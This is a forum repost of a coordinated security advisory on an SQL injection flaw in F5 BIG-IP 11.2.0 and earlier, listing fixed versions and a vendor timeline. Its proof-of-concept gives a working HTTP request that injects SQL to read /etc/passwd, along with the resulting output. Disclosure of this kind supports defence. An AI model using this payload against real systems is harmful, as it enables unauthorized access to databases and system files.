Praetorian503 Posted January 23, 2013 Report Posted January 23, 2013 F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >======================================================================= title: SQL Injection product: F5 BIG-IP vulnerable version: <=11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-3000 impact: Medium homepage: http://www.f5.com/ found: 2012-09-03 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com=======================================================================Vendor/product description:---------------------------"The BIG-IP product suite is a system of application delivery services thatwork together on the same best-in-class hardware platform or software virtualinstance. From load balancing and service offloading to acceleration andsecurity, the BIG-IP system delivers agility—and ensures your applicationsare fast, secure, and available."URL: http://www.f5.com/products/big-ip/Vulnerability overview/description:-----------------------------------A SQL injection vulnerability exists in a BIG-IP component. This enables anauthenticated attacker to access the MySQL database with the rights of MySQLuser "root" (= highest privileges).Furthermore an attacker can access files in the file system with the rights ofthe "mysql" OS user.Proof of concept:-----------------The following exploit shows how files can be extracted from the file system:POST /sam/admin/reports/php/saveSettings.php HTTP/1.1Host: bigipCookie: BIGIPAuthCookie=*VALID_COOKIE*Content-Length: 119{ "id": 2, "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --x" }Note: target fields are only VARCHAR(60) thus MID() is used for extractingdata.A request to /sam/admin/reports/php/getSettings.php returns the data:HTTP/1.1 200 OK...{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}Vulnerable / tested versions:-----------------------------The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.Successful exploitation was possible with Application Security (ASM) or AccessPolicy (APM) enabled.Vendor contact timeline:------------------------2012-10-04: Sending advisory draft and proof of concept.2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3.2013-01-22: SEC Consult releases coordinated security advisory.Solution:---------Update to 11.2.0 HF3 or 11.2.1 HF3.Workaround:-----------No workaround available.Advisory URL:--------------https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Unternehmensberatung GmbHOffice ViennaMooslackengasse 17A-1190 ViennaAustriaTel.: +43 / 1 / 890 30 43 - 0Fax.: +43 / 1 / 890 30 43 - 25Mail: research at sec-consult dot comwww.sec-consult.comEOF S. Viehböck / @2013Source: PacketStorm Quote